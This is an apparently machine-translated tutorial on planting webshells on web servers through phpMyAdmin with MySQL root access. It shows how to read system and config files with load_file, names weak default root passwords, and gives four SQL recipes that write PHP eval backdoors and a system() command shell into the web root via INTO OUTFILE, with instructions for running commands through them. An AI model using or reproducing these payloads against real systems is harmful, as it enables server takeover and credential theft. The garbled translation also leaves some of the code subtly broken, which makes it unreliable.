Use webshell for phpmyadmin statement execution and more detailed methods

Use webshell to execute phpmyadmin statements

You can try the root password in the following ways:

Method: load_file ()

C: boot. ini
Load_file (0x433A5C626F6F742E696E69) in hexadecimal notation
Load_file (char (67,58, 92,98, 111,111,116, 46,105,110,105) ascii
Conn. php config. php mainconn. php

In many cases, if the administrator does not change the root password, the weak password root rrot 123 and other passwords can be used to log on.

When we have the highest root permission of phpmyadmin and know the physical path of the website (the physical path is usually displayed in the website background)

You can use the SQL statement to obtain the webshell of the website.

Assume that the physical path of the website is C: htdocs.

You can execute the following SQL statement

---- Start code ---
Create TABLE a (cmd text not null );
Insert INTO a (cmd) VALUES ('<? Php @ eval ($ _ POST [cmd])?> ');
Select cmd from a into outfile 'C:/htdocs/1. Php'; (modify the physical path of the website to/here /)
Drop table if exists;
---- End code ---


If the preceding information is displayed after the statement is executed, the SQL statement has been successfully executed. Then you can add 1. php to the root directory of the website to directly obtain a sentence.

Then, you can access the webshell of the website through a client link.


More detailed method:

First

Create table 'mysql'. 'Darkmoon '('darkmoon1' text not null );
Insert into 'mysql'. 'Dark' ('darkmoon1') VALUES ('<? Php @ eval ($ _ POST [pass]);?> ');
SELECT 'darkmoon1' FROM 'darkmoon 'into outfile' d:/wamp/www/exehack. Php ';
Drop table if exists 'darkmoon ';

(This method is the most common and has a high success rate. What do you mean if you know SQL statements at a glance)
The above code means to select the musql database, create a darkmoon table, and add a field named darkmoon1.
Insert a line of code in the field of darkmoon1.
Then export a sentence from the darkmoon1 field to the file name of d:/wamp/www/exehack. php (the path here is the program path of the website)
The last step is to delete the darkmoon table.

Method 2

Create TABLE moon (darkmoon text not null );
Insert INTO moon (darkmoon) VALUES ('<? Php @ eval ($ _ POST [pass]);?> ');
Select darkmoon from moon into outfile 'd:/wamp/www/exehack. Php ';
Drop table if exists moon;

The above method is basically consistent with Method 1.

Method 3:

Select '<? Php @ eval ($ _ POST [pass]);?> 'Into outfile' d:/wamp/www/exehack. Php'

Method 4

Select '<? Php echo '<pre>'; system ($ _ GET ['cmd']); echo '</pre>';?> 'Into outfile' d:/wamp/www/exehack. Php'

The difference is that after the export is successful, you can directly execute the doscommand (as long as the permission is large enough)
How to use: www.xxx.com/exehack.php? Cmd = (cmd = directly execute the doscommand)
The above four methods are generally sufficient to obtain the webshell permission of the website.
If you know the physical path of the website, try the method or the physical path of the website.